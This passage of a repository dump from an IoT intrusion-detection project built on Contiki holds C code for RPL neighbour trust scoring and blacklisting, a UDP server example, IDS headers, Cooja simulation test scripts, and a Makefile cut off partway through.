LOG_INFO(\"IP:%d\",nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8)-1]);\n\n if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == UIP_IP_BUF->srcipaddr.u8[sizeof(UIP_IP_BUF->srcipaddr.u8) - 1])\n {\n nodes[j].counterDetect[c] = nodes[j].counterDetect[c] + 1;\n flag_detector = 1;\n break;\n }\n else if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == 0)\n {\n nodes[j].fromNode[c] = UIP_IP_BUF->srcipaddr;\n nodes[j].counterDetect[c] = 1;\n flag_detector = 1;\n break;\n }\n }\n break;\n }\n\n j++;\n \n \n }\n\n LOG_INFO(\"afteirneter:%d %d %d\\n\",j,nodes[j].address,NODES_NUM);\n // LOG_INFO(\"BEDNODES\\n\");\n if (j == NODES_NUM || flag_detector == 1)\n continue;\n\n if (flag_detector == 0 && nodes[j].address == 0 && countflag == 0)\n {\n nodes[j].address = ip_end;\n nodes[j].counterDIS = tmpdis;\n nodes[j].counterMsg = tmpdio;\n nodes[j].intervals = tmpinter;\n nodes[j].blackhole_mal=0;\n\n uint8_t c = 0;\n\n for (c = 0; c < DETECTORS_NUM; c++)\n {\n if (nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8) - 1] == 0)\n {\n nodes[j].fromNode[c] = UIP_IP_BUF->srcipaddr;\n nodes[j].counterDetect[c] = 1;\n break;\n }\n }\n // LOG_INFO(\"IPde:%d %d\",nodes[j].fromNode[c].u8[sizeof(nodes[j].fromNode[c].u8)-1],nodes[j].counterDetect[c]);\n }\n // PRINTF(\"inside added:%u dis:%lu dio:%lu in:%lu\\n\",j,nodes[j].address,nodes[j].counterDIS,nodes[j].intervals);\n\n } //ends for\n\n // LOG_INFO(\"BDIS\\n\");\n goto discard;\n\n //for (k=0;k<6;k++){\n // PRINTF(\"%d add:%d dis:%d in:%d\\n\",k,nodes[k].address,nodes[k].counterDIS,nodes[k].intervals);\n\n // }\n //Finish and clear\ndiscard:\n // LOG_INFO(\"CARDIN\\n\");\n uipbuf_clear();\n\n#endif /*IDS_SERVER code*/\n}\n\n//Function to send statistics to benign nodes\n\n\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n#if MALICIOUS==0 && IDS_CLIENT==0 && IDS_SERVER == 0 && CLONE_ATTACK==0 && IDS_OF==1\n// //Function to parse input from benign\nvoid ids_input_benign(void)\n{\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n\n // LOG_INFO(\"received success from client\\n\");\n\n uint32_t curr_time=clock_time();\n uint8_t flag_interval=0;\n // LOG_INFO(\"time:%d,%d\\n\",curr_time,last_time_from_ids);\n\n if (last_time_from_ids+150 > curr_time ){\n // LOG_INFO(\"same IDSavoid\\n\");\n flag_interval=1;\n }\n\n last_time_from_ids=curr_time;\n \n\n uint16_t pos = 0;\n uint8_t instance_id;\n instance_id = buffer[pos++];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_INFO(\"IDS IN: unknown instance, discard\\n\");\n goto discard;\n }\n\n uint8_t counter = (int)buffer[pos++];\n uint8_t i = 0;\n rpl_nbr_t *nbr;\n\n for (i = 0; i < counter; i++)\n {\n\n uint8_t ipend = buffer[pos];\n pos = pos + sizeof(uint8_t);\n\n for (nbr = nbr_table_head(rpl_neighbors);\n nbr != NULL;\n nbr = nbr_table_next(rpl_neighbors, nbr))\n {\n // i++;\n\n uip_ipaddr_t *ip_nbr = rpl_neighbor_get_ipaddr(nbr);\n // LOG_INFO(\"bef:%d %d\\n\", ipend, ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n if (ip_nbr==NULL || ipend != ip_nbr->u8[sizeof(ip_nbr->u8) - 1])\n {\n continue;\n }\n\n const struct link_stats *stats= rpl_neighbor_get_link_stats(nbr);\n int16_t direct_trust=-1;\n \n //skip if node didn't send to nbr\n if (stats==NULL || stats->cnt_current.num_packets_tx==0)\n continue;\n\n\n //We got the correct ip from packet for this nbr\n //Below uncomment to calculate trust_value\n //buffer[pos] is verified from ids\n uint8_t verified=buffer[pos];\n pos = pos + 1;\n uint16_t fw_packets_buf=get16(buffer, pos);\n\n //Avoid updating packets 2 times when we receive from multiple IDS detectors\n if (flag_interval==1 && nbr->fw_packets >= fw_packets_buf){\n //buffer:5, nbr->fw:3\n LOG_INFO(\"NBRFW:%d >= %d actual:%d\\n\",nbr->fw_packets,fw_packets_buf,stats->cnt_current.num_packets_tx);\n\n if (verified==1){\n if (fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.05*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0 && nbr->fw_packets>5)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.01*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n \n }else if (verified==0){\n if (fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.2*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else\n direct_trust=0;\n }\n \n nbr->verified_node=verified;\n // direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.01*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n nbr->trust_value=direct_trust;\n\n if (ip_nbr!=NULL && direct_trust<26){\n if (!check_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1])){\n update_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n rpl_local_repair(\"IDS trigger\");\n // rm_bh_from_nbr_table(&ip_nbr);\n }\n }else if (ip_nbr!=NULL && direct_trust>50){//remove from list trusted node\n remove_from_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]); \n }\n\n \n pos = pos + sizeof(uint16_t);\n break;\n \n }\n\n // LOG_INFO(\"infobef:%d buf:%d,sent:%d\\n\",nbr->fw_packets ,fw_packets_buf,stats->cnt_current.num_packets_tx);\n //transmitted less than forward, update directly\n \n //Enter only if sent more than what detected.\n if ((stats->cnt_current.num_packets_tx>nbr->fw_packets && fw_packets_buf>0) || \n (fw_packets_buf+nbr->fw_packets >= stats->cnt_current.num_packets_tx) ){\n nbr->fw_packets = stats->cnt_current.num_packets_tx;\n }else{\n nbr->fw_packets += fw_packets_buf;\n }\n\n\n pos = pos + sizeof(uint16_t);\n nbr->verified_node=verified;\n\n LOG_INFO(\"packet dropped:%d fw:%d ver:%d buf:%d sent:%d\\n\",(stats->cnt_current.num_packets_tx - nbr->fw_packets),nbr->fw_packets,verified,fw_packets_buf,stats->cnt_current.num_packets_tx);\n\n //Check if fw_packets from buffer is zero and customize penalty\n if (fw_packets_buf==0 && verified==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (fw_packets_buf>0 && verified==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.2*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (verified==1 && fw_packets_buf==0)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.1*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else if (verified==1 && fw_packets_buf>0 && nbr->fw_packets>5)\n direct_trust=(nbr->fw_packets/(nbr->fw_packets+0.5*(stats->cnt_current.num_packets_tx - nbr->fw_packets)))*100;\n else\n direct_trust=0;\n \n LOG_INFO(\"trust:%d\\n\",direct_trust);\n nbr->trust_value=direct_trust;\n\n if (direct_trust<26){\n LOG_INFO(\"blacklst:%d\\n\",ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n \n //If node not in blacklist, add\n if (ip_nbr!=NULL && !check_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1])){\n update_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n rpl_local_repair(\"IDS trigger\");\n // rm_bh_from_nbr_table(&ip_nbr);\n // LOG_INFO(\"added to list:%d\\n\",ip_nbr->u8[sizeof(ip_nbr->u8) - 1]);\n }\n\n }else if (direct_trust>50){//remove from list trusted node\n // LOG_INFO(\"recover blklist node\\n\");\n remove_from_list(ip_nbr->u8[sizeof(ip_nbr->u8) - 1]); \n }\n // if (verified==1 && direct_trust==0)\n // direct_trust=1;\n\n // if (nbr->trust_value < 50 && direct_trust == 0)\n // {\n // if (nbr->trust_value - 10 >= 0)\n // nbr->trust_value = nbr->trust_value - 10;\n // else\n // nbr->trust_value = 0;\n // }\n // else if, (nbr->trust_value > 50 && direct_trust == 0)\n // {\n // if (nbr->trust_value - 20 >= 0)\n // nbr->trust_value = nbr->trust_value - 20;\n // else\n // nbr->trust_value = 0;\n // }\n // else if (nbr->trust_value > 50 && direct_trust>= 1){\n // if (nbr->trust_value + 20 <= 100)\n // nbr->trust_value = nbr->trust_value + 20;\n // else\n // nbr->trust_value = 100;\n // }else if (direct_trust>=1){//trust_value<50\n // if (nbr->trust_value + 10 <= 100)\n // nbr->trust_value = nbr->trust_value + 10;\n // else\n // nbr->trust_value = 100;\n // }\n\n //buffer[pos] is verified\n\n \n // LOG_INFO(\"got:%d totfw:%d res:%d\\n\", ipend ,nbr->fw_packets,direct_trust);\n\n // nbr->fw_packets=0; //Reset after 15 minutes\n \n break;\n }\n }\n\n //Go through neighbours and save the details\n // for(nbr = nbr_table_head(rpl_neighbors);\n // nbr != NULL;\n // nbr = nbr_table_next(rpl_neighbors, nbr)) {\n // // i++;\n\n // uip_ipaddr_t * ip_nbr=rpl_neighbor_get_ipaddr(nbr);\n // // uint8_t j=0;\n\n // for(i=0;i<counter;i++){\n\n // uint8_t ipend=buffer[pos++];\n // LOG_INFO(\"bef:%d %d\\n\",ipend,ip_nbr->u8[sizeof(ip_nbr->u8)-1]);\n // if (ipend!=ip_nbr->u8[sizeof(ip_nbr->u8)-1]){\n // pos=pos+1+sizeof(uint16_t);\n // // ipend=buffer[pos++];\n // // j+=1;\n // if (i+1>=counter)\n // pos=2;\n // continue;\n // }\n\n // //We got the correct ip from packet for this nbr\n // nbr->trust_value=buffer[pos++];//get16(buffer,pos);\n\n // nbr->fw_packets=get16(buffer,pos);\n // pos = pos + sizeof(uint16_t);\n // LOG_INFO(\"RECV:%d %d tot:%d\\n\",ipend,nbr->trust_value,nbr->fw_packets);\n // pos=2; //Location of ip\n // }\n\n // LOG_INFO(\"RECV yy:%d %d\\n\",ipend,ip_nbr->u8[sizeof(ip_nbr->u8)-1]);\n //Find next ip in the packet if available\n\n // if (ipend==0 || ipend!=ip_nbr->u8[sizeof(ip_nbr->u8)-1])\n // continue;\n\n // nbr->trust_value=buffer[pos++];//get16(buffer,pos);\n\n // nbr->fw_packets=get16(buffer,pos);\n // pos = pos + sizeof(uint16_t);\n // LOG_INFO(\"RECV:%d %d tot:%d\\n\",ipend,nbr->trust_value,nbr->fw_packets);\n // pos=2; //Location of ip\n\n // }\n\n goto discard;\n\n//Discard packet\ndiscard:\n uipbuf_clear();\n}\n#endif\n\n//IDS functions\n#if IDS_CLIENT==1\nvoid ids_output_to_benign(void *ipaddr)\n{\n uip_ipaddr_t *ipaddr2=NULL;\n if (ipaddr!=NULL)\n ipaddr2=ipaddr;\n \n fw_stats *m;\n for (m = nbr_table_head(nbr_fw_stats); m != NULL;\n m = nbr_table_next(nbr_fw_stats, m))\n {\n\n linkaddr_t *lladdr = nbr_table_get_lladdr(nbr_fw_stats, m);\n \n if (&curr_instance.dag.dag_id==NULL){\n LOG_INFO(\"Error ids\\n\");\n uipbuf_clear();\n return;\n\n }else if (ipaddr2!=NULL){\n ipaddr2=&curr_instance.dag.dag_id;\n }\n\n if (ipaddr2==NULL){\n LOG_INFO(\"null here\\n\");\n uipbuf_clear();\n return;\n }\n\n ipaddr2->u8[sizeof(ipaddr2->u8) - 1] = lladdr->u8[sizeof(lladdr->u8) - 1];\n\n //Add the link-local prefix to send to neighbor\n ipaddr2->u8[0] = 254;\n ipaddr2->u8[1]= 128;\n // ipaddr->u8[2] = lladdr->u8[2];\n // ipaddr->u8[3] = lladdr->u8[3];\n\n // LOG_INFO_LLADDR(ipaddr);\n\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n uint16_t pos = 0;\n //Change instance to send to normal nodes\n buffer[pos++] = 0;\n // Get the number of nodes evaluated\n buffer[pos++] = m->index;\n // pos = pos + sizeof(char);\n\n uint8_t i = 0;\n for (i = 0; i < m->index; i++)\n {\n //Put ip, number of packets, and verified\n // buffer[pos++] = ((int)m->dest[i]) >> 8;\n // buffer[pos++] = ((int)m->dest[i]) & 0xff;\n // set16(buffer, pos, );\n // pos = pos + sizeof(char);\n buffer[pos] = m->dest[i];\n pos = pos + sizeof(uint8_t);\n buffer[pos++] = (int)m->verified[i];\n \n set16(buffer, pos, m->count_fw_packets[i]);\n pos = pos + sizeof(uint16_t);\n\n LOG_INFO(\"NOW:%d to:%d count:%d, ver:%d i:%d\\n\", lladdr->u8[sizeof(lladdr->u8) - 1], m->dest[i], m->count_fw_packets[i], m->verified[i], i);\n m->count_fw_packets[i] = 0;\n m->verified[i] = 0;\n m->dest[i]=0;\n }\n if ((int)m->index > 0)\n {\n LOG_INFO(\"OF:packet sent to \");\n LOG_INFO_6ADDR(ipaddr2);\n LOG_INFO_(\"\\n\");\n \n uip_icmp6_send(ipaddr2, ICMP6_RPL, RPL_CODE_IDS_NORM, 2 + (m->index) * (1 + sizeof(uint8_t) + sizeof(uint16_t)));\n\n buffer[0]=1; //ids instance\n //Send blackhole to IDS \n uip_ipaddr_t addr2;\n \n if (rpl_dag_get_root_ipaddr(&addr2)){\n addr2.u8[sizeof(addr2.u8) - 1]=1;\n // LOG_INFO(\"root:\");\n // LOG_INFO_6ADDR(&addr2);\n uip_icmp6_send(&addr2, ICMP6_RPL, RPL_CODE_IDS2, 2 + (m->index) * (1 + sizeof(uint8_t) + sizeof(uint16_t)));\n }\n \n }\n else\n LOG_INFO(\"OF:No info to send!\\n\");\n \n //Zero the index for number of nodes\n m->index=0;\n }\n\n uipbuf_clear();\n return;\n}\n#endif\n\n/** @}*/\n"
},
{
"alpha_fraction": 0.6399257779121399,
"alphanum_fraction": 0.6531416773796082,
"avg_line_length": 29.588651657104492,
"blob_id": "be76156778e1785080a1897463e2ac0cc6197b8d",
"content_id": "2746177963065b9d851a9d4fcaaa75deaba1e818",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4313,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 141,
"path": "/examples/rpl-udp/udp-server.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "/*\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. Neither the name of the Institute nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n * This file is part of the Contiki operating system.\n *\n */\n\n#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n#include \"net/netstack.h\"\n#include \"net/ipv6/simple-udp.h\"\n\n#if IDS_SERVER == 1\n#include \"ids.h\"\n#endif\n#include \"sys/log.h\"\n#define LOG_MODULE \"App\"\n#define LOG_LEVEL LOG_LEVEL_INFO\n\n#define WITH_SERVER_REPLY 1\n#define UDP_CLIENT_PORT\t8765\n#define UDP_SERVER_PORT\t5678\n\nextern void checkNodes();\nstatic struct simple_udp_connection udp_conn;\n\n#if IDS_SERVER == 1\n static struct ctimer time_to_reset;\n static void reset_stats();\n#endif\n\nPROCESS(udp_server_process, \"UDP server\");\nAUTOSTART_PROCESSES(&udp_server_process);\n/*---------------------------------------------------------------------------*/\nstatic void\nudp_rx_callback(struct simple_udp_connection *c,\n const uip_ipaddr_t *sender_addr,\n uint16_t sender_port,\n const uip_ipaddr_t *receiver_addr,\n uint16_t receiver_port,\n const uint8_t *data,\n uint16_t datalen)\n{\n LOG_INFO(\"Received request '%.*s' from \", datalen, (char *) data);\n LOG_INFO_6ADDR(sender_addr);\n LOG_INFO_(\"\\n\");\n#if WITH_SERVER_REPLY\n /* send back the same string to the client as an echo reply */\n LOG_INFO(\"Sending response.\\n\");\n simple_udp_sendto(&udp_conn, data, datalen, sender_addr);\n#endif /* WITH_SERVER_REPLY */\n}\n\n#if IDS_SERVER == 1\nstatic void reset_stats(void *ptr){\n uint8_t i=0;\n for (i=0;i<NODES_NUM;i++){\n nodes[i].address=0;\n nodes[i].counterMsg=0;\n nodes[i].counterDIS=0;\n nodes[i].intervals=999;\n nodes[i].timestamp=0;\n nodes[i].detected=0;\n nodes[i].last_avg_rss=0;\n nodes[i].spoof_suspicious=0;\n nodes[i].blackhole_mal=0;\n\n uint8_t c=0;\n for (c=0;c<DETECTORS_NUM;c++){\t\t\n nodes[i].counterDetect[c]=0;\n nodes[i].fromNode[c].u8[sizeof(nodes[i].fromNode[c].u8)-1]=0;\n\n }\n }\n\n \n ctimer_reset(&time_to_reset);\n}\n#endif\n\n\n/*---------------------------------------------------------------------------*/\nPROCESS_THREAD(udp_server_process, ev, data)\n{\n static struct etimer mytimer;\n\n PROCESS_BEGIN();\n\n /* Initialize DAG root */\n NETSTACK_ROUTING.root_start();\n\n /* Initialize UDP connection */\n simple_udp_register(&udp_conn, UDP_SERVER_PORT, NULL,\n UDP_CLIENT_PORT, udp_rx_callback);\n\n etimer_set(&mytimer, 20*CLOCK_SECOND);\n\n #if IDS_SERVER == 1\n //Reset after 30 min\n ctimer_set(&time_to_reset,1800*CLOCK_SECOND,reset_stats,NULL);\n #endif\n\n while(1){\n\n PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n\n // PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n // if (etimer_expired(&mytimer)) {\n #if IDS_SERVER==1\n checkNodes();\n #endif\n\n etimer_reset(&mytimer);\n // }\n }\n\n PROCESS_END();\n}\n/*---------------------------------------------------------------------------*/\n"
},
{
"alpha_fraction": 0.6532663106918335,
"alphanum_fraction": 0.6582914590835571,
"avg_line_length": 15.666666984558105,
"blob_id": "65a91f77f45db40b9b86398aeb14769830da649b",
"content_id": "3746dd802ada97697cd61523ce20017181d8555c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 12,
"path": "/os/net/routing/ids-app/of_ids.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef OF_IDS_H\n#define OF_IDS_H\n\n\n// #if IDS_OF==1\n// extern list_t blacklist;\n// typedef void **list_t;\n// void *blacklist_list=NULL;\n// list_t blacklist=(list_t)&blacklist_list;\n// #endif\n\n#endif"
},
{
"alpha_fraction": 0.7429149746894836,
"alphanum_fraction": 0.7854251265525818,
"avg_line_length": 40.16666793823242,
"blob_id": "e0e6f331794aac93c3a6bc50eb986621240cca82",
"content_id": "34f07fdc4fd1fc68393e81c7bdbc2efeb26e7de4",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 494,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 12,
"path": "/tools/cooja/Testing/tt.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#/bin/bash\n\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS1\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS2\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS3\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS4\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS5\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS6\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS7\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS8\n#./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS9\n./RUN_REPEATED.sh 5 read_IDS_allnodes_sciptIDS10\n"
},
{
"alpha_fraction": 0.6853369474411011,
"alphanum_fraction": 0.7122039794921875,
"avg_line_length": 20.125,
"blob_id": "1178fc841d6875e5a18abb04260db0efc6534ed7",
"content_id": "9e3ce3bfcc181e96f7b1b6ba01e10f9b4dfe67e9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2196,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 104,
"path": "/os/net/routing/ids-app/ids.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef IDS_H\n#define IDS_H\n\n#include \"os/net/ipv6/uip-debug.h\"\n#include \"contiki.h\"\n#include <stdio.h>\n#include <string.h>\n\n\n#include \"sys/ctimer.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"net/ipv6/uip-ds6.h\"\n#include \"os/net/routing/rpl-lite/rpl.h\"\n#include \"net/nbr-table.h\"\n\n#include <stdlib.h>\n#include <ctype.h>\n\n#if IDS_SERVER==1\n#pragma message (\"IDS_SERVER\")\n#define NODES_NUM 10 //Change this for future simulations\n#define DETECTORS_NUM 10\n#elif IDS_CLIENT==1\n#pragma message (\"IDS_CLIENT\")\n#define NODES_NUM_CL 10\n#else\n#pragma message (\"IDS_GENERAL\")\n#endif\n\n\n//Detectors_num=number of ids detectors\n//Nodes_num= number of neighbour malicious nodes\n//BR can save 5 mal nodes, ids det. save 10 mal\n// #if IDS_OF==0\n\ntypedef struct IDS_ctr{\n \n uint16_t address;\n //IDS detectors are 6\n #if IDS_SERVER==1 /*IDS_SERVER 3 detectors*/\n uip_ip6addr_t fromNode[DETECTORS_NUM];\n uint8_t counterDetect[DETECTORS_NUM];\n uint8_t blackhole_mal;\n #endif /*IDS_SERVER 3 detectors*/\n uint16_t counterMsg;\n uint16_t counterDIS;\n uint32_t intervals;\n uint32_t timestamp;\n char detected;\n uint16_t last_avg_rss;\n char spoof_suspicious;\n \n} ids_ctr_t;\n\n\n//Mine for IDS\nextern uip_ipaddr_t IdsServerAddr;\nextern uint16_t ip_end;\nextern uint16_t countInNodes;\n\n// #endif\n\n//3 instead of 6 detectors, 6 mal nodes\n#if IDS_SERVER==1 /*IDS_SERVER*/\nextern uint16_t detectorsIP[DETECTORS_NUM];\nvoid checkNodes();\n#endif /*IDS_SERVER*/\n\n\n//Average time,number of DIS for IDS\n//typedef struct IDS_ctr ids_ctr_t;\n\n#if IDS_SERVER==1 /*IDS_SERVER*/\nids_ctr_t nodes[NODES_NUM];\n#elif IDS_CLIENT==1\nids_ctr_t nodes[NODES_NUM_CL];\nstruct etimer time_sniff,packet_fw_timer;\n\n//IDS client struct to check Blackhole attack\ntypedef struct tagids{\n uint8_t dest[4]; //max number of parents to send packet\n // char from;\n uint8_t verified[4];\n uint8_t index;\n uint16_t count_fw_packets[4];\n} fw_stats;\n\nNBR_TABLE_DECLARE(nbr_fw_stats);\n\nfw_stats tmp_ip_senders[NODES_NUM_CL];\n#endif\n\n\n#if IDS_OF==1\n\n// typedef struct ids_item ids_item_t;\nvoid update_list(uint8_t mal_node);\nint check_list(uint8_t item);\nvoid remove_from_list(uint8_t ip);\nvoid rm_bh_from_nbr_table(uip_ipaddr_t* from);\n\n#endif\n\n#endif"
},
{
"alpha_fraction": 0.5222052335739136,
"alphanum_fraction": 0.5336906313896179,
"avg_line_length": 19.73015785217285,
"blob_id": "7168bbadba992433215fc5a46e90bf89b71afa24",
"content_id": "1b455bd449b1dd254c6a444a3fae9cdb1259387b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1306,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 63,
"path": "/tools/cooja/Testing/RUN_TEST.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 -o $# -gt 2 ]; then\n echo \"Usage: $0 <test> [logfile]\"\n exit\nfi\n\nTEST=$1\n\nLOG=/dev/null\nif [ $# -eq 2 ]; then\n LOG=$2\nfi\n\necho \">>>>>>> Starting test: $TEST <<<<<<<<\"\necho -n \"[`date '+%F %T'`] $TEST: \" >> $LOG\n#if [ -f \"COOJA.log\" ]; then\n# rm COOJA.log\n#fi\n#if [ -f \"COOJA.testlog\" ]; then\n# rm COOJA.testlog\n#fi\njava -mx512m -jar ../dist/cooja.jar -nogui=$TEST.csc\nif [ -f \"COOJA.log\" ]; then\n mv COOJA.log $TEST.cooja_log\nfi\nif [ -f \"COOJA.testlog\" ]; then\n mv COOJA.testlog $TEST.log\nfi\n\nOK=0\nif [ -f \"$TEST.log\" ]; then\n OK=`grep \"TEST OK\" $TEST.log | wc -l`\nfi\n\nif [ $OK == 0 ]; then\n echo \"FAIL\" >> $LOG\n if [ -f \"$TEST.info\" ]; then\n echo \"-- TEST INFO ($TEST.info) --\" >> $LOG\n cat $TEST.info >> $LOG\n else\n echo \"-- NO TEST INFO AVAILABLE ($TEST.info) --\" >> $LOG\n fi\n if [ -f \"$TEST.log\" ]; then\n echo \"-- TEST OUTPUT (tail $TEST.log) --\" >> $LOG\n tail -5 $TEST.log >> $LOG\n else\n echo \"-- NO TEST OUTPUT AVAILABLE ($TEST.log) --\" >> $LOG\n fi\n echo \"-- COOJA OUTPUT (tail $TEST.cooja_log) --\" >> $LOG\n tail -10 $TEST.cooja_log >> $LOG\necho >> $LOG\nelse\n echo \"OK\" >> $LOG\nfi\necho >> $LOG\n\nif [ $OK == 0 ]; then\n echo \">>>>>>> Finished test: $TEST FAILED <<<<<<<<\"\nelse\n echo \">>>>>>> Finished test: $TEST OK <<<<<<<<\"\nfi\necho \"\"\n"
},
{
"alpha_fraction": 0.7135792970657349,
"alphanum_fraction": 0.7386839389801025,
"avg_line_length": 25.02970314025879,
"blob_id": "a69db404428dd1f04d43741102d17f605392d576",
"content_id": "9c4b20c9bddb1160319d5ff390a8302410061d61",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 2629,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 101,
"path": "/examples/rpl-udp/Makefile",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "CONTIKI_PROJECT = udp-client udp-server\nTARGET1=whitefield\n\n# all: \n# \tsudo make udp-server TARGET=$(TARGET1) IDS_SERVER=1 RPL_CONF_DEFAULT_INSTANCE=0\n# \tsudo make udp-client-ids TARGET=$(TARGET1) IDS_CLIENT=1 RPL_CONF_DEFAULT_INSTANCE=0\n# \tsudo make udp-client-mal TARGET=$(TARGET1) IDS_CLIENT=2\n# \tsudo make udp-client-clone TARGET=$(TARGET1) IDS_CLIENT=3\n# \tsudo make udp-client TARGET=$(TARGET1) IDS_CLIENT=0 RPL_CONF_DEFAULT_INSTANCE=1\n\n#Normal server, instance 0\nudp-server:\nifeq ($(IDS_SERVER),0)\n$(info 'SERVER')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=0\n\tDEFINES+=IDS_CLIENT=0\n\t# MODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=server\nendif\n\n#IDS server, instance 1\nudp-server:\nifeq ($(IDS_SERVER),1)\n$(info 'SERVER')\n\tDEFINES+=IDS_SERVER=1 RPL_CONF_DEFAULT_INSTANCE=1\n\tDEFINES+=IDS_CLIENT=0\n\tMODULES=os/net/routing/ids-app \n# \tBUILD_DIR_CONFIG=server\nendif\n\nudp-client-ids: \nifeq ($(IDS_CLIENT),1)\n$(info 'IDSCLIENT')\n\tDEFINES+=IDS_SERVER=0 RPL_CONF_DEFAULT_INSTANCE=1\n\tDEFINES+=IDS_CLIENT=1 \n\tDEFINES+=RPL_CONF_DEFAULT_LEAF_ONLY=0\n\t# DEFINES+=RPL_CONF_DAO_MAX_RETRANSMISSIONS=3 LINK_STATS_CONF_ETX_FROM_PACKET_COUNT=1\n\tMODULES=os/net/routing/ids-app\n\t# BUILD_DIR_CONFIG=ids-client\n$(info DEFINE $(DEFINES))\nendif\n\n#Used for blackhole or clone nodes\nudp-client-mal:\nifeq 